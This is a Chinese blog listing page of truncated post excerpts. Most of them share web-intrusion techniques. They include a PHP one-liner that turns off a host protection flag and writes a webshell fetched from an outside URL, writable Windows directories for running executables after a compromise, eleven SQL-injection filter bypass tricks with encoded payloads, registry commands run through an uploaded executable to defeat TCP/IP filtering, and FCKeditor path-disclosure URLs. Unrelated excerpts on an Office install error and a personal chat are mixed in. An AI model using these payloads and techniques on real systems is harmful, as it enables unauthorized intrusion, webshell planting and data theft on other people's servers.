写马不成功,phpinfo()一看
auto_prepend_file /var/chroot/home/content/protect.php
好像会定义一个全局变量$mrno,可能是控制防护开关之类的。
这玩意肯定不是好东西,常规的copy、move上传方法不起效,导致超时。
<?php $GLOBALS["mrno"] = 0;file_put_contents('data.php',file_get_contents('http://x.com/xxxyyyzzz.txt'));?>
成功写下shel[……]
recycler、temp目录就不说了,特别是有aspx的权限,找不到exe执行目录,都不好意思:
C:\windows\system32\spool\PRINTERS\ C:\WINDOWS\IIS Temporary Compressed Files\ C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files C:\Documents and Settings\N[......]
防注入绕过必用11招
1、运用编码技术绕过
如URLEncode编码,ASCII编码绕过。
例如or 1=1即
%6f%72%20%31%3d%31
而Test也可以为
CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)
2、通过空格绕过
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
or'' swords'' =‘swords''
由于mssql的松散性,我们可以把or ”swords” 之间的空格去掉,并不影响运行。
3、运用字符串判断代替[……]
我们要做的就是导出他注册表的三处,更改后再导入就可以了,回到〖Wscript.Shell〗执行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip"
#导出注册表里关于TCP/IP筛选的第一处
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit[......]
搜集于网络、以及个人经验
—————————————————————————————————————
1、查看编辑器版本
/fckeditor/editor/dialog/fck_about.html
2、爆绝对路径
FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php(支持php的通杀)
/FC[……]
今天在windowXP上先把office2003,然后安装office2007时候突然提示“Windows Installer 服务不能更新一个或多个受保护的Windows 文件”,百思不得其解,百度了一下答案千奇百出,经过几番周折,终于找出根本原因:XP系统中的某些文件被修改或者无法找到或者丢失,下面给大家分析解决一下:
1.打开C:\WINDOWS\msagent。查看您此文件中是否和下面的列举一样,否则请从后面的链接中下载包并覆盖;
2.打开C:\Program Files\Common Files\Microsoft Shared\web server extens[……]
这个是今天QQ和某同学的聊天记录,当然里面只有我的这部分了,感觉或许有用,这里记录下:
如果有美女搭讪我的话,我真未必会一直坚持住
所以最好的方法就是在对对方有感觉之前,就敬而远之
譬如在签名明显的地方放上已婚两个字
我平时可没这么有女人缘的
当然有可能她们找我聊时,她们自己也没有察觉到什么
这个从生物角度上讲,就是异性的优越性带来的心理上的好感
就跟雄鸟要配偶要将自己的窝装的漂亮一样
原始人跟我们不一样,女人主要需要强壮的男人,这样一是有依靠,二是后代也强壮
男人找女人呢,主要找身体强壮并且胸大的,这样才能给予[……]
最新评论